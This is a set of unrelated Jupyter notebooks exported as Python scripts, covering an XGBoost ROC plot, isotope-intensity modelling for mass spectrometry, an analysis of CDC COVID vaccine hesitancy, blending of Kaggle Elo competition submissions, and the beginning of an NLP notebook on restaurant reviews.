matplotlib.rcParams['figure.figsize'] = (10.0, 10.0)
plt.plot(fpr_train, tpr_train, label='Train ROC AUC {0}'.format(roc_auc_train))
plt.plot(fpr_test, tpr_test, label='Test ROC AUC {0}'.format(roc_auc_test))
plt.plot([0, 1], [0, 1], '--', color=(0.6, 0.6, 0.6))
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('XGB Classifier', size=16)
plt.legend(loc='lower right')
plt.show()
# -
# В результате мы получили значение AUC равное 0.7, что в принципе говорит о том, что выбранная модель сравнительна неплоха =)
| 9,673 |
/finalProject/model_ipynb.ipynb
|
6b3d80cca232354c2a07c1b037c87a0483c54e3e
|
[] |
no_license
|
1nconsistent/Emotiondetection
|
https://github.com/1nconsistent/Emotiondetection
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,210 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import expanduser
PROTON_MASS = 1.007276
# the level of intensity at which the detector is in saturation
SATURATION_INTENSITY = 3000
# the number of isotopes to look for in the m/z dimension - the theoretical model includes 7 (the monoisotopic plus 6 isotopes)
NUMBER_OF_ISOTOPES = 7
def calculate_monoisotopic_mass_from_mz(monoisotopic_mz, charge):
monoisotopic_mass = (monoisotopic_mz * charge) - (PROTON_MASS * charge)
return monoisotopic_mass
# Find the ratio of H(peak_number)/H(peak_number-1) for peak_number=1..6
# peak_number = 0 refers to the monoisotopic peak
# number_of_sulphur = number of sulphur atoms in the molecule
#
# source: Valkenborg et al, "A Model-Based Method for the Prediction of the Isotopic Distribution of Peptides", https://core.ac.uk/download/pdf/82021511.pdf
def peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur):
MAX_NUMBER_OF_SULPHUR_ATOMS = 3
MAX_NUMBER_OF_PREDICTED_RATIOS = 6
S0_r = np.empty(MAX_NUMBER_OF_PREDICTED_RATIOS+1, dtype=np.ndarray)
S0_r[1] = np.array([-0.00142320578040, 0.53158267080224, 0.00572776591574, -0.00040226083326, -0.00007968737684])
S0_r[2] = np.array([0.06258138406507, 0.24252967352808, 0.01729736525102, -0.00427641490976, 0.00038011211412])
S0_r[3] = np.array([0.03092092306220, 0.22353930450345, -0.02630395501009, 0.00728183023772, -0.00073155573939])
S0_r[4] = np.array([-0.02490747037406, 0.26363266501679, -0.07330346656184, 0.01876886839392, -0.00176688757979])
S0_r[5] = np.array([-0.19423148776489, 0.45952477474223, -0.18163820209523, 0.04173579115885, -0.00355426505742])
S0_r[6] = np.array([0.04574408690798, -0.05092121193598, 0.13874539944789, -0.04344815868749, 0.00449747222180])
S1_r = np.empty(MAX_NUMBER_OF_PREDICTED_RATIOS+1, dtype=np.ndarray)
S1_r[1] = np.array([-0.01040584267474, 0.53121149663696, 0.00576913817747, -0.00039325152252, -0.00007954180489])
S1_r[2] = np.array([0.37339166598255, -0.15814640001919, 0.24085046064819, -0.06068695741919, 0.00563606634601])
S1_r[3] = np.array([0.06969331604484, 0.28154425636993, -0.08121643989151, 0.02372741957255, -0.00238998426027])
S1_r[4] = np.array([0.04462649178239, 0.23204790123388, -0.06083969521863, 0.01564282892512, -0.00145145206815])
S1_r[5] = np.array([-0.20727547407753, 0.53536509500863, -0.22521649838170, 0.05180965157326, -0.00439750995163])
S1_r[6] = np.array([0.27169670700251, -0.37192045082925, 0.31939855191976, -0.08668833166842, 0.00822975581940])
S2_r = np.empty(MAX_NUMBER_OF_PREDICTED_RATIOS+1, dtype=np.ndarray)
S2_r[1] = np.array([-0.01937823810470, 0.53084210514216, 0.00580573751882, -0.00038281138203, -0.00007958217070])
S2_r[2] = np.array([0.68496829280011, -0.54558176102022, 0.44926662609767, -0.11154849560657, 0.01023294598884])
S2_r[3] = np.array([0.04215807391059, 0.40434195078925, -0.15884974959493, 0.04319968814535, -0.00413693825139])
S2_r[4] = np.array([0.14015578207913, 0.14407679007180, -0.01310480312503, 0.00362292256563, -0.00034189078786])
S2_r[5] = np.array([-0.02549241716294, 0.32153542852101, -0.11409513283836, 0.02617210469576, -0.00221816103608])
S2_r[6] = np.array([-0.14490868030324, 0.33629928307361, -0.08223564735018, 0.01023410734015, -0.00027717589598])
model_params = np.empty(MAX_NUMBER_OF_SULPHUR_ATOMS, dtype=np.ndarray)
model_params[0] = S0_r
model_params[1] = S1_r
model_params[2] = S2_r
ratio = None
if (((1 <= peak_number <= 3) & (((number_of_sulphur == 0) & (498 <= monoisotopic_mass <= 3915)) |
((number_of_sulphur == 1) & (530 <= monoisotopic_mass <= 3947)) |
((number_of_sulphur == 2) & (562 <= monoisotopic_mass <= 3978)))) |
((peak_number == 4) & (((number_of_sulphur == 0) & (907 <= monoisotopic_mass <= 3915)) |
((number_of_sulphur == 1) & (939 <= monoisotopic_mass <= 3947)) |
((number_of_sulphur == 2) & (971 <= monoisotopic_mass <= 3978)))) |
((peak_number == 5) & (((number_of_sulphur == 0) & (1219 <= monoisotopic_mass <= 3915)) |
((number_of_sulphur == 1) & (1251 <= monoisotopic_mass <= 3947)) |
((number_of_sulphur == 2) & (1283 <= monoisotopic_mass <= 3978)))) |
((peak_number == 6) & (((number_of_sulphur == 0) & (1559 <= monoisotopic_mass <= 3915)) |
((number_of_sulphur == 1) & (1591 <= monoisotopic_mass <= 3947)) |
((number_of_sulphur == 2) & (1623 <= monoisotopic_mass <= 3978))))):
beta0 = model_params[number_of_sulphur][peak_number][0]
beta1 = model_params[number_of_sulphur][peak_number][1]
beta2 = model_params[number_of_sulphur][peak_number][2]
beta3 = model_params[number_of_sulphur][peak_number][3]
beta4 = model_params[number_of_sulphur][peak_number][4]
scaled_m = monoisotopic_mass / 1000.0
ratio = beta0 + (beta1*scaled_m) + beta2*(scaled_m**2) + beta3*(scaled_m**3) + beta4*(scaled_m**4)
return ratio
isotope_idx_not_in_saturation = 4
# +
isotope_intensities_l = []
isotope_intensities_l.append((1130.578349, 10000))
isotope_intensities_l.append((1131.080031, 12000))
isotope_intensities_l.append((1131.581029, 11000))
isotope_intensities_l.append((1132.082188, 10500))
isotope_intensities_l.append((1132.582894, 10000))
isotope_intensities_l.append((1133.084192, 9500))
isotope_intensities_l.append((1133.585446, 9000))
isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['mz_centroid','summed_intensity'])
# -
charge = 2
monoisotopic_mz = isotope_intensities_df.iloc[0].mz_centroid
monoisotopic_mass = calculate_monoisotopic_mass_from_mz(monoisotopic_mz, charge)
monoisotopic_mass = 1170
# +
isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity # set the summed intensity to be the default adjusted intensity for all isotopes
isotope_intensities_df['inferred'] = False
# adjust the monoisotopic intensity if it has points in saturation. We can use an isotope that's
# not in saturation as a reference, as long as there is one
if (isotope_idx_not_in_saturation is not None) and (isotope_idx_not_in_saturation > 0):
# using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
if phr is not None:
Hpn_minus_1 = Hpn / phr
isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
isotope_intensities_df.at[peak_number-1, 'inferred'] = True
Hpn = Hpn_minus_1
else:
break
intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
inferred = int(isotope_intensities_df.iloc[0].inferred) # whether the monoisotope intensity was inferred
# -
isotope_intensities_df
intensity
# +
f, ax = plt.subplots()
colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']
markerline, stemlines, baseline = ax.stem(isotope_intensities_df.mz_centroid, isotope_intensities_df.summed_intensity, use_line_collection=True, label='before adjustment for saturation')
plt.setp(markerline, 'color', 'tab:green')
plt.setp(stemlines, 'color', 'tab:green')
plt.setp(baseline, 'color', colors[7])
plt.setp(markerline, 'alpha', 0.6)
plt.setp(stemlines, 'alpha', 0.6)
markerline, stemlines, baseline = ax.stem(isotope_intensities_df.mz_centroid, isotope_intensities_df.inferred_intensity, use_line_collection=True, label='after adjustment for saturation')
plt.setp(markerline, 'color', 'tab:orange')
plt.setp(stemlines, 'color', 'tab:orange')
plt.setp(baseline, 'color', colors[7])
plt.setp(markerline, 'alpha', 0.6)
plt.setp(stemlines, 'alpha', 0.6)
plt.xlabel('m/z')
plt.ylabel('intensity')
f.set_figheight(3)
f.set_figwidth(7)
f.set_dpi(160)
plt.margins(0.02)
plt.legend(loc='best')
# plt.title('Isotopes before and after saturation adjustment')
plt.show()
# -
# #### plot the maximum inferred intensity
MAX_SUMMED_APEX_POINTS = 3 * SATURATION_INTENSITY
isotope_idx_not_in_saturation = 4
mz_lower = 300
mz_upper = 1700
charge_lower = 2
charge_upper = 4
isotope_not_saturated_indexes = [1,2,3,4,5,6] # index of the first isotope not saturated
mono_mass_lower = calculate_monoisotopic_mass_from_mz(mz_lower, charge_lower)
mono_mass_upper = calculate_monoisotopic_mass_from_mz(mz_upper, charge_upper)
mono_mass_lower, mono_mass_upper
mono_mass_values = list(np.arange(start=mono_mass_lower, stop=mono_mass_upper))
isotopes_l = []
for isotope_idx_not_in_saturation in isotope_not_saturated_indexes:
mono_intensities_l = []
for monoisotopic_mass in mono_mass_values:
isotope_intensities_l = list(np.full((NUMBER_OF_ISOTOPES,), MAX_SUMMED_APEX_POINTS))
isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['summed_intensity'])
isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity
isotope_intensities_df['inferred'] = False
# using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
if phr is not None:
Hpn_minus_1 = Hpn / phr
isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
isotope_intensities_df.at[peak_number-1, 'inferred'] = True
Hpn = Hpn_minus_1
else:
break
monoisotope_intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
inferred = int(isotope_intensities_df.iloc[0].inferred) # whether the monoisotope intensity was inferred
mono_intensities_l.append((monoisotopic_mass,monoisotope_intensity,inferred))
mono_intensities_df = pd.DataFrame(mono_intensities_l, columns=['monoisotopic_mass','inferred_mono_intensity','inferred'])
isotopes_l.append(mono_intensities_df)
tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
(44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
(148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
(227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
# Rescale to values between 0 and 1
for i in range(len(tableau20)):
r, g, b = tableau20[i]
tableau20[i] = (r / 255., g / 255., b / 255.)
# +
f, ax = plt.subplots()
f.set_figheight(5)
f.set_figwidth(7)
f.set_dpi(160)
plt.margins(x=0.06, y=0.02)
plt.xticks(fontsize=8)
plt.yticks(fontsize=8)
# title = 'maximum inferred intensity by monoisotopic mass'
# plt.title(title)
for idx in range(len(isotopes_l)):
mono_intensities_df = isotopes_l[idx]
plot_df = mono_intensities_df[mono_intensities_df.inferred == True]
ax.plot(plot_df.monoisotopic_mass, np.log2(plot_df.inferred_mono_intensity), marker='', color=tableau20[idx+1 % len(tableau20)], linestyle='-', linewidth=1, ms=2, label='isotope {} not saturated'.format(idx+1))
plt.axhline(y=np.log2(MAX_SUMMED_APEX_POINTS), color='red', linestyle='-.', linewidth=1, label='maximum unsaturated mono intensity')
plt.legend(loc='best', fontsize=8)
plt.xlabel('monoisotopic mass (Da)', fontsize=8)
plt.ylabel('log2 inferred intensity', fontsize=8)
plt.show()
# -
f.savefig('{}/paper-2-figure-9.tiff'.format(expanduser('~')), dpi=300, bbox_inches='tight')
monoisotopic_mass = 1170.563881
# +
isotope_intensities_l = list(np.full((NUMBER_OF_ISOTOPES,), MAX_SUMMED_APEX_POINTS))
isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['summed_intensity'])
isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity
isotope_intensities_df['inferred'] = False
# using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
if phr is not None:
Hpn_minus_1 = Hpn / phr
isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
isotope_intensities_df.at[peak_number-1, 'inferred'] = True
Hpn = Hpn_minus_1
else:
break
monoisotope_intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
# -
monoisotope_intensity
| 13,615 |
/Higgins_Capstone.ipynb
|
2b2d97ce07bd347d9df1f426b28115dc0d62b12a
|
[] |
no_license
|
cahigginsNEU/ALY6140
|
https://github.com/cahigginsNEU/ALY6140
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 129,965 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Covid Vaccine Rates in the United States
# +
#Data Extraction
import pandas as pd
import io
import requests
import matplotlib.pyplot as plt
import numpy as np
import datetime
import seaborn as sns
from sklearn.linear_model import LinearRegression
from matplotlib.colors import LogNorm
import warnings
warnings.filterwarnings('ignore')
#Data extracted from https://data.cdc.gov/Vaccinations/Fully-Vaccinated-Adults/jm79-dz78
#Dataset of Vaccine Hesitancy Rates in the United States
url="https://data.cdc.gov/api/views/q9mh-h2tw/rows.csv?accessType=DOWNLOAD&bom=true&format=true"
s=requests.get(url).content
df=pd.read_csv(io.StringIO(s.decode('utf-8')))
print(df)
# +
#Data Cleanup
states = df['State'].unique()
print(states)
per_state = pd.DataFrame(states)
per_state['Estimated hesitant'] = 0.0
per_state['Estimated hesitant or unsure'] = 0.0
per_state['Estimated strongly hesitant'] = 0.0
per_state['Percent adults fully vaccinated against COVID-19'] = 0.0
per_state['Percent Hispanic']=0.0
per_state['Percent non-Hispanic American Indian/Alaska Native']=0.0
per_state['Percent non-Hispanic Asian']=0.0
per_state['Percent non-Hispanic Black']=0.0
per_state['Percent non-Hispanic Native Hawaiian/Pacific Islander']=0.0
per_state['Percent non-Hispanic White']=0.0
for i in range(len(states)):
per_state['Estimated hesitant'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated hesitant'].mean()
per_state['Estimated hesitant or unsure'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated hesitant or unsure'].mean()
per_state['Estimated strongly hesitant'][i] = df.loc[df['State'] == per_state[0][i], 'Estimated strongly hesitant'].mean()
per_state['Percent adults fully vaccinated against COVID-19'][i] = df.loc[df['State'] == per_state[0][i], 'Percent adults fully vaccinated against COVID-19'].mean()
per_state['Percent Hispanic'][i] = df.loc[df['State'] == per_state[0][i], 'Percent Hispanic'].mean()
per_state['Percent non-Hispanic American Indian/Alaska Native'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic American Indian/Alaska Native'].mean()
per_state['Percent non-Hispanic Asian'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Asian'].mean()
per_state['Percent non-Hispanic Black'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Black'].mean()
per_state['Percent non-Hispanic Native Hawaiian/Pacific Islander'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic Native Hawaiian/Pacific Islander'].mean()
per_state['Percent non-Hispanic White'][i] = df.loc[df['State'] == per_state[0][i], 'Percent non-Hispanic White'].mean()
rename = {'Estimated hesitant': "Hesitant", 'Estimated hesitant or unsure' : "Unsure",'Estimated strongly hesitant' : "Strongly Hesitant" ,
'Percent adults fully vaccinated against COVID-19': "Fully Vaccinated" ,'Percent Hispanic': 'Hispanic', 'Percent non-Hispanic American Indian/Alaska Native': 'American Indian/Alaskan Native',
'Percent non-Hispanic Asian':'Asian', 'Percent non-Hispanic Black': 'Black', 'Percent non-Hispanic Native Hawaiian/Pacific Islander': "Hawaiian/Pacific Islander",
'Percent non-Hispanic White': 'White' }
per_state.rename(columns = rename, inplace = True)
print(per_state)
# +
#Data Visualization
#Which states have the highest and lowest average rates of vaccination?
vax= per_state.sort_values('Fully Vaccinated', ascending=False).dropna(subset = ['Fully Vaccinated'])
most_vaccinated = vax.head(10)
least_vaccinated = vax.tail(10)
print(most_vaccinated)
print(least_vaccinated)
# +
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.bar(vax[0],vax['Fully Vaccinated'])
plt.xticks(vax[0], rotation='vertical')
plt.width=4
plt.ylabel('Average Percentages')
plt.xlabel ('State')
plt.title('Average Fully Vaccinated Individuals by State')
from matplotlib import rcParams
#customize graph
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Verdana']
rcParams['font.size'] = 6
plt.show()
# +
#What states have the highest and lowest average rate of stongly hesitant people?
opposed= per_state.sort_values('Strongly Hesitant', ascending=False).dropna(subset = ['Strongly Hesitant'])
high_opposed = opposed.head(10)
low_opposed = opposed.tail(10)
print(high_opposed)
print(low_opposed)
#Trends: 1. the states with the lowest rates of vaccination do not necessarily match to those with the highest opposition
# 2. The states with the highest vaccination rates are mostly in the Northeast part of America
# 3. The States with lowest vaccination rates are mostly located in the Sotueast part of the country.
# -
per_state.plot(kind="barh", stacked = True)
plt.legend(bbox_to_anchor=(1.05,1))
plt.draw
plt.yticks(np.arange(len(per_state[0])), per_state[0], rotation = 0)
plt.xlabel('Average Percentages')
plt.ylabel ('State')
plt.title("View of Vaccine Status in All States")
# +
# I expected to see that this would be consistent with the highest and lowest states with fully vaccinated individuals
# but was surprised to see that the states with the lowest rates of vaccination are not the same as those with the
# highest amount of vaccine hesitancy. This leads me to believe that there is more involved with the low rates of
# fully vaccinated individuals in some states, perhaps vaccine availibity is an issue.
# +
#Of the fully vaccinated in the highest vaccinated state (Connectivut) vs the lowest vaccinated state (Georgia), is there some racial disparity?
per_state ['No Info']=per_state[['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White']].apply(lambda x: 1 - x.sum(), axis = 1)
#print(per_state['No Info'])
labels = ['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']
t_sizes = per_state.loc[38,['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']]
b_sizes = per_state.loc[6,['Hispanic', 'American Indian/Alaskan Native', 'Asian', 'Black', 'Hawaiian/Pacific Islander', 'White', 'No Info']]
fig1, ax1 = plt.subplots()
ax1.pie(t_sizes, labels=labels, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal')
plt.title('Connecticut')
fig2, ax2 = plt.subplots()
ax2.pie(b_sizes, labels=labels, autopct='%1.1f%%',
shadow=True, startangle=90)
ax2.axis('equal')
plt.title('Georgia')
| 6,741 |
/Trunc norm mean .ipynb
|
d616936fe5879ac1a25571c81e47ad7b3a203fdc
|
[] |
no_license
|
mukeshpilaniya/kaggle
|
https://github.com/mukeshpilaniya/kaggle
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 294,034 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"></ul></div>
# -
# %matplotlib inline
# %load_ext autoreload
# %autoreload 4
# %autosave 120
from fastai.io import *
from fastai.structured import *
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
from pandas_summary import DataFrameSummary
from IPython.display import display
from sklearn import metrics
import feather
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold, RepeatedKFold
from sklearn.metrics import mean_squared_error
import warnings
import gc
PATH = './'
# !ls
'combined_submission-2019-02-26 22:47:23.452323.csv' - 3.684
'dl_xgb_submission_stacked_lgb-2019-02-26 22:45:24.597929.csv' - 3.687
'combined_submission-2019-02-22 21:40:05.269919.csv' - 3.685
'dl_submission_stacked_lgb-2019-02-22 21:37:59.515079.csv' - 3.685
'dl_submission-2019-02-22 21:30:24.851272.csv' - 3.745
'outlier_combining_submission-2019-02-19 02:48:44.830259.csv'- 3.690
'outlier_combining_submission-2019-02-19 02:28:13.811057.csv' - 3.689
'submission-2019-02-19 00:51:48.972772.csv' - 3.717
'blend_kfol_st.csv' - 3.693
'submission-2019-02-13 22:48:45.005871.csv' - 3.691
'submission-2019-01-12 13:53:27.215115.csv'- 3.696
'submission-2019-01-17 23:23:57.743505.csv' - 3.696
'submission-2019-01-20 19:35:24.892043.csv' - 3.695
'chandu_mean1.csv' - 3.694
'submission-2019-02-02 23:13:59.670630.csv' - 3.693
'submission-2019-02-13 00:42:12.274968.csv' - 3.692
'submission_kfold-2019-02-13 00:55:25.132146.csv' - 3.692
'submission-2019-02-15 14:22:06.881490.csv' - 3.695
'outlier_combining_submission-2019-02-19 02:12:16.662625.csv' - 3.689
'combined_submission-2019-02-20 00:21:17.597315.csv'- 3.686
'xg_submission_stacked_lgb-2019-02-21 13:41:48.181414.csv' - 3.688
'combined_submission-2019-02-21 13:55:21.772806.csv' - 3.684
'combined_submission-2019-02-22 20:49:55.088273.csv' - 3.684
df_3_684_452323 = pd.read_csv('combined_submission-2019-02-26 22:47:23.452323.csv', names=['card_id', 'df_3_684_452323'], skiprows=[0], header=None)
df_3_687_597929 = pd.read_csv('dl_xgb_submission_stacked_lgb-2019-02-26 22:45:24.597929.csv', names=['card_id', 'df_3_687_597929'], skiprows=[0], header=None)
df_3_685_269919 = pd.read_csv('combined_submission-2019-02-22 21:40:05.269919.csv', names=['card_id', 'df_3_685_269919'], skiprows=[0], header=None)
df_3_685_515079 = pd.read_csv('dl_submission_stacked_lgb-2019-02-22 21:37:59.515079.csv', names=['card_id', 'df_3_685_515079'], skiprows=[0], header=None)
df_3_745_851272 = pd.read_csv('dl_submission-2019-02-22 21:30:24.851272.csv', names=['card_id', 'df_3_745_851272'], skiprows=[0], header=None)
df_3_690_830259 = pd.read_csv('outlier_combining_submission-2019-02-19 02:48:44.830259.csv', names=['card_id', '3_690_830259'], skiprows=[0], header=None)
df_3_689_811057 = pd.read_csv('outlier_combining_submission-2019-02-19 02:28:13.811057.csv', names=['card_id', 'df_3_689_811057'], skiprows=[0], header=None)
df_3_717_972772 = pd.read_csv('submission-2019-02-19 00:51:48.972772.csv', names=['card_id', 'df_3_717_972772'], skiprows=[0], header=None)
df_3_693_blend_kfol_st = pd.read_csv('blend_kfol_st.csv', names=['card_id', 'df_3_693_blend_kfol_st'], skiprows=[0], header=None)
df_3_691_005871 = pd.read_csv('submission-2019-02-13 22:48:45.005871.csv', names=['card_id', 'df_3_691_005871'], skiprows=[0], header=None)
df_3_696_215115 = pd.read_csv('submission-2019-01-12 13:53:27.215115.csv', names=['card_id', '3_696_215115'], skiprows=[0], header=None)
df_3_696_743505 = pd.read_csv('submission-2019-01-17 23:23:57.743505.csv', names=['card_id', 'df_3_696_743505'], skiprows=[0], header=None)
df_3_695_892043 = pd.read_csv('submission-2019-01-20 19:35:24.892043.csv', names=['card_id', 'df_3_695_892043'], skiprows=[0], header=None)
df_3_694_chandu_mean1 = pd.read_csv('chandu_mean1.csv', names=['card_id', 'df_3_694_chandu_mean1'], skiprows=[0], header=None)
df_3_693_670630 = pd.read_csv('submission-2019-02-02 23:13:59.670630.csv', names=['card_id', 'df_3_693_670630'], skiprows=[0], header=None)
df_3_692_274968 = pd.read_csv('submission-2019-02-13 00:42:12.274968.csv', names=['card_id', 'df_3_692_274968'], skiprows=[0], header=None)
df_3_692_132146 = pd.read_csv('submission_kfold-2019-02-13 00:55:25.132146.csv', names=['card_id', 'df_3_692_132146'], skiprows=[0], header=None)
df_3_695_881490 = pd.read_csv('submission-2019-02-15 14:22:06.881490.csv', names=['card_id', 'df_3_695_881490'], skiprows=[0], header=None)
df_3_689_662625 = pd.read_csv('outlier_combining_submission-2019-02-19 02:12:16.662625.csv', names=['card_id', 'df_3_689_662625'], skiprows=[0], header=None)
df_3_686_597315 = pd.read_csv('combined_submission-2019-02-20 00:21:17.597315.csv', names=['card_id', '3_686_597315'], skiprows=[0], header=None)
df_3_688_181414 = pd.read_csv('xg_submission_stacked_lgb-2019-02-21 13:41:48.181414.csv', names=['card_id', 'df_3_688_181414'], skiprows=[0], header=None)
df_3_684_772806 = pd.read_csv('combined_submission-2019-02-21 13:55:21.772806.csv', names=['card_id', 'df_3_684_772806'], skiprows=[0], header=None)
df_3_684_088273 = pd.read_csv('combined_submission-2019-02-22 20:49:55.088273.csv', names=['card_id', 'df_3_684_088273'], skiprows=[0], header=None)
df_base = df_3_684_088273
df_base = pd.merge(df_base, df_3_684_452323, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_687_597929, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_685_269919, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_685_515079, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_745_851272, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_690_830259, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_689_811057, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_717_972772, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_693_blend_kfol_st, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_691_005871, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_696_215115, how='inner', on='card_id')
# df_base = pd.merge(df_base, df_3_696_743505, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_695_892043, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_694_chandu_mean1, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_693_670630, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_692_274968, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_692_132146, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_695_881490, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_689_662625, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_686_597315, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_688_181414, how='inner', on='card_id')
df_base = pd.merge(df_base, df_3_684_772806, how='inner', on='card_id')
plt.figure(figsize=(16,12))
sns.heatmap(df_base.iloc[:,1:].corr(),annot=True,fmt=".2f")
M = np.zeros([df_base.iloc[:,1:].shape[1],df_base.iloc[:,1:].shape[1]])
for i in np.arange(M.shape[1]):
for j in np.arange(M.shape[1]):
M[i,j] = np.sqrt(metrics.mean_squared_error(df_base.iloc[:,i+1], df_base.iloc[:,j+1]))
df_base['target'] = df_base.iloc[:,1:].mean(axis=1)
gc.collect()
# +
# df_base['target'] = df_3_745_851272['df_3_745_851272']* 0.1 + df_base['target'] * 0.9
# -
df_base[['card_id','target']].to_csv("mean_of_all_final.csv",index=False)
# !kaggle competitions submit elo-merchant-category-recommendation -f 'mean_of_all_final.csv' -m "blending top 14 submissions"
# +
df_base['target'] = df_3_745_851272['df_3_745_851272']* 0.1 + df_base['target'] * 0.9
plt.figure(figsize=(8,8))
plt.subplot(1, 2, 1)
sns.boxplot(df_3_745_851272['df_3_745_851272'],orient='v')
plt.subplot(1, 2, 2)
sns.boxplot(df_base['target'], orient='v')
plt.show()
# df_base[['card_id','target']].to_csv("blend3.csv",index=False)
# -
from scipy.stats import truncnorm
df_base.shape, df_3_684_088273.shape
df_base.head()
df_base1 = df_base[['card_id', 'target']]
df_base1.shape, df_3_684_088273.shape
truncnorm.mean()
df_3_687_597929['df_3_687_597929'].head()
len(df_3_684_088273['df_3_684_088273'].values.tolist())
len(df_3_687_597929['df_3_687_597929'].values.tolist())
truncnorm.mean(df_3_684_088273['df_3_684_088273'].values.tolist(), df_3_687_597929['df_3_687_597929'].values.tolist())
df_base3['target'] = truncnorm.mean(df_3_684_088273['df_3_684_088273'],df_base1['target'])
df_base[['card_id','target']].to_csv("blend3_truncnorm.csv",index=False)
| 8,893 |
/Natural Language Processing.ipynb
|
2aa5432bd7eabf162ba5c80076ce5e7f8abcc705
|
[] |
no_license
|
alamin19/Natural-Language-Processing
|
https://github.com/alamin19/Natural-Language-Processing
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,368 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
dataset.shape
dataset['Review'][0]
#cleaning text
import re
import nltk
nltk.download('stopwords')
